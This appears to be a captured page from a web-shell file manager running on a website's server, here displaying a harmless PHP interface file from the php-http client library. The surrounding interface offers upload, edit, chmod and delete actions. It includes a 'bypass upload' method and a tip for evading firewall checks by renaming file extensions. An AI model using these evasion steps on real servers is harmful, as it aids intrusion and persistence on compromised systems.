Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
invoice-sync.bitkit.dk
httpdocs
vendor
php-http
client-common
src
File Content:
HttpClientPool.php
<?php declare(strict_types=1); namespace Http\Client\Common; use Http\Client\Common\HttpClientPool\HttpClientPoolItem; use Http\Client\HttpAsyncClient; use Http\Client\HttpClient; use Psr\Http\Client\ClientInterface; /** * A http client pool allows to send requests on a pool of different http client using a specific strategy (least used, * round robin, ...). */ interface HttpClientPool extends HttpAsyncClient, HttpClient { /** * Add a client to the pool. * * @param ClientInterface|HttpAsyncClient|HttpClientPoolItem $client */ public function addHttpClient($client): void; }
Edit
Download
Unzip
Chmod
Delete